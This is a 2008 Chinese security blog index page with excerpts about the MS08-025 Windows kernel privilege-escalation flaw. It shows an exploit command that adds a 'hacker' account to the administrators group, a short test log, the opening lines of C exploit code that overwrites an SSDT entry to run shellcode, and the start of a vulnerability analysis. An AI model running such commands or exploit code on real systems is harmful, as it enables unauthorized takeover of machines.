鬼仔's Blog

update(2008.5.9):姬良：“这个和网上的不同，这个不是用双引号括住命令，而是用参数-s”

来源：%5C

真正可用的MS08025。
为了多次运行，服务器蓝屏，请直接用一次运行所有的命令
比如：
MS08025 “cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add”

Local Privilege Escalation Vulnerability Exploit(MS08025)

阅读全文 »

来源：酒水不犯茶水

Win2k CN SP2 ，Win2k3 CN SP1下测试通过，其它未测试(不装XP那种垃圾)
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系统发生 5 错误。
拒绝访问。

阅读全文 »

来源：vessial’s easylife

另一种利用方式，通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行
#include <stdio.h>
#include <windows.h>
typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,


阅读全文 »

来源:安全焦点
Author: Polymorphours
Email: [email protected]
Homepage:http://www.whitecell.org
Date: 2008-04-10

经内部讨论后决定公布分析成果。

4月8号microsoft再次发布了一个系统内核的补丁(KB941693),微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。 成功利用此漏洞的本地攻击者可以完全控制受影响的系统。 攻击者可随后安装程序；查看、更改或删除数据；或者创建新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2003、Windows 阅读全文 »